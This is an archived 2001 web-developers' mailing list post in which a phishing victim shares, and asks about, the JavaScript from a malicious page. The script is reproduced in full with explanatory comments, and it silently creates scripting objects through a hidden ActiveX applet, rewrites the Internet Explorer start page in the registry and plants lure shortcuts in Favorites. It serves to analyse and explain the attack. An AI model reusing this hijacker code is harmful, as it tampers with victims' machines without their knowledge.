Not so nice JS intruding on a computer without one's knowledge

by "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>

 Date:  Fri, 10 Aug 2001 16:57:27 -0400
 To:  "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
 References:  tim
Hello,

I am curious.  I got an email, and it had a simple message:  "Your password
has been changed.  To restore your password click here."  Well, I knew it was
a trap of sorts, but to stay on top of things I went there anyway.

When I got there it was a blank page that said your password has been
restored.  Nothing else.  A website I have never seen before.  In viewing the
html, I saw that the page calls up a javascript.

I captured the script below.  Would someone please tell me what all this
thing has done?  Obviously it is attempting to make changes to my registry
and favorites folder, but what else is it doing?
Thanks in Advance
Nancy
(I changed the two urls that it included to generics to use as examples.  I
had just had a friend experience this and it is very angering for me.)

_________________________________________

// Writes an invisible (height 0, width 0) applet tag into the page. The class
// named in code= is com.ms.activeX.ActiveXComponent; f() below drives this
// applet to create COM objects by CLSID.
// NOTE(review): this presumably only works where the browser allows an
// untrusted page to load that class - a patched Java VM or a zone setting
// that blocks Java/ActiveX for Internet content should stop it here; confirm.
// (The string literal is hard-wrapped by the mail archive; kept as captured.)
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>")



// Creates an Internet shortcut file named DispName + .URL inside folder loc
// and points it at SiteURL, then saves it to disk.
//   loc      - folder path the shortcut is written into (f() passes the
//              Favorites folder it located)
//   DispName - file name, and so the label shown in the Favorites menu
//   SiteURL  - address the shortcut opens
// Depends on the global Shl object that f() assigns before calling this.
// There is no check for an existing file of the same name.
function AddFavLnk(loc, DispName, SiteURL)
{
// CreateShortcut is called with a path ending in .URL, then the target is set.
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
 Shor.TargetPath = SiteURL;
// Save() is the step that actually writes the file.
Shor.Save();
}

// Main payload. In order, it:
//   1. uses the hidden applet to obtain three scripting COM objects,
//   2. sets a 90-day cookie Chg=general,
//   3. overwrites the current user Internet Explorer Start Page value,
//   4. locates the Favorites folder and drops two .URL shortcuts into it.
// Nothing else is done by this listing: no file is read, deleted or uploaded,
// and no other registry value is written.
// Every failure is swallowed by the empty catch blocks, so the visitor sees
// no error whether or not the changes were made.
// What to check on a machine that visited the page: the Start Page value under
// HKCU\Software\Microsoft\Internet Explorer\Main, and unexpected .URL files
// in the Favorites folder.
function f(){
try
{
// a1, Shl, FSO and Net are assigned without var, so they become globals;
// AddFavLnk() relies on Shl being global.
a1=document.applets[0];
// CLSID of the Windows Script Host shell object (WScript.Shell); used below
// for RegWrite and CreateShortcut.
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
// CLSID of Scripting.FileSystemObject; used below for folder lookups.
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
// CLSID of the Windows Script Host network object (WScript.Network); used
// below only to read the logged-on user name.
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try{

// Expiry date 90 days from now (24 h * 60 min * 60 s * 1000 ms * 90).
// NOTE(review): the cookie is only written, never read, in this listing;
// presumably it marks the visitor as already processed - confirm against
// the hosting page.
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"


////////////////////////////////////////////////////////////////////////////
/// (original comment is mis-encoded in the archive; the surviving bytes
/// suggest a GB2312 heading meaning home page - unconfirmed)


// Replaces the per-user Internet Explorer start page. The poster replaced the
// real URL with a placeholder. HKCU is writable by the user, so no
// administrator rights are involved.
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page", "http://badwebsitename here/");
// Exact repeat of the cookie write above; it has no additional effect.
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"
var WF, Shor, loc;
// GetSpecialFolder(0) is the Windows folder; first guess is a Favorites
// folder directly beneath it.
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";

// Fallback: same drive, per-user profile path built from the user name.
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName +
"\\Favorites";
if(!FSO.FolderExists(loc))
{
// Neither location exists: stop quietly. The Start Page write above has
// already happened by this point.
return;
}
}

////////////////////////////////////////////////////////////////////////////
/// (original comment is mis-encoded in the archive; the surviving bytes
/// decode as the GB2312 word for Favorites)


// Two shortcuts are added; both URLs were replaced by the poster.
AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
AddFavLnk(loc, " Aol", "http://www.aol.com");
}
// Errors from the cookie, registry or shortcut steps are discarded.
catch(e){ }
}
// Errors from creating the COM objects are discarded too.
catch(e){ }
}
// Schedules the payload: the string passed to setTimeout is evaluated as code
// after 1000 ms, which calls f().
// NOTE(review): the one-second delay presumably gives the applet written by
// document.write time to load before f() touches document.applets[0] - confirm.
function init(){
setTimeout("f()", 1000);
}
// Runs as soon as the script is loaded; no user action is needed.
init();
_______________________________________________

HWG hwg-techniques mailing list archives, maintained by Webmasters @ IWA